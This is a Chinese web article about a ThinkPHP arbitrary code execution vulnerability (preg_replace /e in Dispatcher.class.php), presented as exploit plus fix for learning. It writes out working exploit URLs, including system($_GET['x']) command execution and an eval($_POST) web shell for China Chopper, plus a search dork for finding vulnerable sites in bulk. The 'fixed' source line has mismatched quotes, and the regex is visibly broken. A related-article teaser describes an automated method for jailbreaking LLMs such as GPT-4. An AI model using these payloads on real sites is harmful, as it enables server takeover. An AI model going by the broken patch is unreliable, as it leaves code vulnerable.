ThinkPHP框架任意代码执行漏洞的利用及其修复方法-php手册-php.cn

Home

php教程

php手册

ThinkPHP框架任意代码执行漏洞的利用及其修复方法

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 13, 2016 am 09:32 AM

thinkphp frameworkrepairloopholes

ThinkPHP是国内著名的开源的PHP框架，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkPHP，并且遵循Apache2开源协议发布。早期的思想架构来源于Struts，后来经过不断改进和完善，同时也借鉴了国外很多优秀的框架和模式，使用面向对象的开发结构和MVC模式，融合了Struts的Action和Dao思想和JSP的TagLib（标签库）、RoR的ORM映射和ActiveRecord模式，封装了CURD和一些常用操作，单一入口模式等，在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现.

然而近期thinkphp框架爆出了一个任意代码执行漏洞，其危害性相当的高,漏洞利用方法如下：

index.php/module/aciton/param1/${@print(THINK_VERSION)}
 
index.php/module/aciton/param1/${@function_all()}

其中的function_all代表任何函数，比如:

index.php/module/aciton/param1/${@phpinfo()}

就可以获取服务器的系统配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}&#63;x=ls -al

可以列出网站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}

就可以直接执行一句话代码，用菜刀直接连接.

这样黑客们就可以直接通过google批量搜索关键字：thinkphp intitle:系统发生错误来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。

thinkphp框架执行任意代码漏洞修复方法：

用户可下载官方发布的补丁：

http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838

或者或者直接修改源码：

将/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

修改为：

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));

将preg_replace第二个参数中的双引号改为单引号，防止其中的php变量语法被解析执行。

注：本文仅供学习参考使用，请不要用于非法用途。

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

不到一分钟、不超过20步，任意绕过安全限制，成功越狱大型模型！而且不必知道模型内部细节——只需要两个黑盒模型互动，就能让AI全自动攻陷AI，说出危险内容。听说曾经红极一时的“奶奶漏洞”已经被修复了:如今，面对“侦探漏洞”、“冒险家漏洞”和“作家漏洞”，人工智能应该采取何种应对策略呢？一波猛攻下来，GPT-4也遭不住，直接说出要给供水系统投毒只要……这样那样。关键这只是宾夕法尼亚大学研究团队晒出的一小波漏洞，而用上他们最新开发的算法，AI可以自动生成各种攻击提示。研究人员表示，这种方法相比于现有的

如何解决PHP语言开发中常见的文件上传漏洞？Jun 10, 2023 am 11:10 AM

在Web应用程序的开发中，文件上传功能已经成为了基本的需求。这个功能允许用户向服务器上传自己的文件，然后在服务器上进行存储或处理。然而，这个功能也使得开发者更需要注意一个安全漏洞：文件上传漏洞。攻击者可以通过上传恶意文件来攻击服务器，从而导致服务器遭受不同程度的破坏。PHP语言作为广泛应用于Web开发中的语言之一，文件上传漏洞也是常见的安全问题之一。本文将介

Java中的缓冲区溢出漏洞及其危害Aug 09, 2023 pm 05:57 PM

Java中的缓冲区溢出漏洞及其危害缓冲区溢出是指当我们向一个缓冲区写入超过其容量的数据时，会导致数据溢出到其他内存区域。这种溢出行为常常被黑客利用，可以导致代码执行异常、系统崩溃等严重后果。本文将介绍Java中的缓冲区溢出漏洞及其危害，同时给出代码示例以帮助读者更好地理解。Java中广泛使用的缓冲区类有ByteBuffer、CharBuffer、ShortB

Java中的逗号运算符漏洞和防护措施Aug 10, 2023 pm 02:21 PM

Java中的逗号运算符漏洞和防护措施概述：在Java编程中，我们经常使用逗号运算符来同时执行多个操作。然而，有时候我们可能会忽略逗号运算符的一些潜在漏洞，这些漏洞可能导致意外的结果。本文将介绍Java中逗号运算符的漏洞，并提供相应的防护措施。逗号运算符的用法：逗号运算符在Java中的语法为expr1,expr2，可以说是一种序列运算符。它的作用是先计算ex

非常全面！PHP常见漏洞代码总结！Jan 20, 2023 pm 02:22 PM

本篇文章给大家带来了关于PHP漏洞的相关知识，其中主要给大家总结介绍PHP的常见漏洞代码都有哪些，非常全面详细，下面一起来看一下，希望对需要的朋友有所帮助。

Zerodium 宣布为 Microsoft Outlook 零点击 RCE 安全漏洞支付 400,000 美元Apr 29, 2023 pm 09:28 PM

<ul><li><strong>点击进入：</strong>ChatGPT工具插件导航大全</li></ul><figureclass="imageimage--expandable"><imgsrc="/uploads/2023041

提高Linux服务器的安全性：常见安全漏洞和修复方法Sep 11, 2023 pm 05:10 PM

提高Linux服务器的安全性：常见安全漏洞和修复方法随着互联网的快速发展，Linux服务器成为了很多企业和个人的首选。然而，Linux服务器的安全性也面临着各种挑战和威胁。为了确保服务器的安全，管理员需要了解并采取适当的措施来修复常见的安全漏洞。本文将介绍一些常见的安全漏洞和修复方法，以帮助管理员提高Linux服务器的安全性。弱密码弱密码是服务器安全漏洞的常

php如何使用ThinkPHP6框架？May 31, 2023 pm 03:01 PM

随着Web开发的不断发展，开发人员需要使用一些实用的工具和框架来节省时间和努力，同时提高应用程序的品质。ThinkPHP是一个流行的PHP框架，它可以极大地简化开发并提高效率。在本文中，我们将学习如何使用最新版本的ThinkPHP6框架。环境要求首先，您需要确认您的系统满足以下要求：PHP7.1版本及以上MySQL5.5版本及以上Composer是一个

See all articles